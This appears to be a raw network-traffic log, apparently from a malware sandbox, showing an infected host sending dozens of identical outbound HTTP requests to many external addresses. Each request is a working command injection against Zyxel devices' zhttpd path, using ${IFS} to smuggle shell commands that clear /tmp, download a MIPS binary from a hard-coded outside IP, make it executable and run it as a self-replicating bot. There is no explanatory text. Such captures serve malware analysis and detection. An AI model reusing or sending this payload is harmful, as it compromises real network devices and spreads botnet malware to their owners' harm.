                                        Jan 14, 2024 16:18:49.558654070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5403192.168.2.133313069.205.83.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558700085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5404192.168.2.13413102.180.109.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558751106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5405192.168.2.1359096108.168.81.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558809996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5406192.168.2.1352820190.225.242.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558857918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5407192.168.2.1356790134.232.167.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558902025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5408192.168.2.134055079.141.189.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558918953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5409192.168.2.1358688154.254.144.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558969975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5410192.168.2.1337978140.120.197.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558998108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5411192.168.2.1339480216.204.144.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559041023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5412192.168.2.1342472222.163.145.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559088945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5413192.168.2.1340472125.201.91.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559122086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5414192.168.2.1360802102.111.182.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559191942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5415192.168.2.135771242.25.129.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559221029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5416192.168.2.1342114160.181.30.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559226990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5417192.168.2.133578837.4.238.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559283972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5418192.168.2.1337198128.147.146.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559323072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5419192.168.2.1342980200.36.101.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559346914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5420192.168.2.1358268222.17.209.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559403896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5421192.168.2.133642080.244.217.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559458017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5422192.168.2.1349406205.5.167.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559479952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5423192.168.2.1338818151.169.54.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559520006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5424192.168.2.134437038.140.199.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559571028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5425192.168.2.1336072123.197.193.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559607029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5426192.168.2.134863868.106.237.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559664965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5427192.168.2.1344118128.4.114.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559698105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5428192.168.2.134366836.79.167.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559722900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5429192.168.2.134049841.232.114.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559760094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5430192.168.2.1360702181.122.109.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559834003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5431192.168.2.1358648174.151.169.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559854984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5432192.168.2.1356070134.6.65.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559856892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5433192.168.2.1339870168.90.212.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559930086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5434192.168.2.13377981.211.33.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.559981108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5435192.168.2.1356318143.248.226.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560031891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5436192.168.2.13496165.85.111.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560075045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5437192.168.2.1339794182.17.222.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560102940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5438192.168.2.133904834.19.185.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560148954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5439192.168.2.135510094.116.6.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560205936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5440192.168.2.135307223.243.98.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560223103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5441192.168.2.1340720152.231.240.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560262918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5442192.168.2.1338288105.237.199.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560300112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5443192.168.2.1355424130.81.70.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560344934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5444192.168.2.133704089.67.19.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560381889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5445192.168.2.1349032156.188.107.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560436010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5446192.168.2.134075680.183.56.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560480118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5447192.168.2.134852669.192.148.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560523033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5448192.168.2.1345286223.32.154.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560570955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5449192.168.2.1348482160.198.11.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560615063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5450192.168.2.134215018.81.65.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560661077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5451192.168.2.1358604103.21.132.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560712099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5452192.168.2.1344082201.157.50.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560733080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5453192.168.2.1359194121.28.157.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560775042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5454192.168.2.133931242.126.116.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560838938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5455192.168.2.133967262.166.134.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560894966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5456192.168.2.134367480.126.176.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.560980082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5457192.168.2.1346332102.37.232.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561033010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5458192.168.2.1339066137.74.247.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561067104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5459192.168.2.1351814166.119.56.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561113119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5460192.168.2.135485890.216.213.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561145067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5461192.168.2.1353436112.61.51.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561182976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5462192.168.2.1338694105.232.80.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561218977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5463192.168.2.1341922209.242.32.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561264038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5464192.168.2.133292678.132.123.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561304092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5465192.168.2.135065884.75.73.176443
                                        TimestampBytes transferredDirectionData
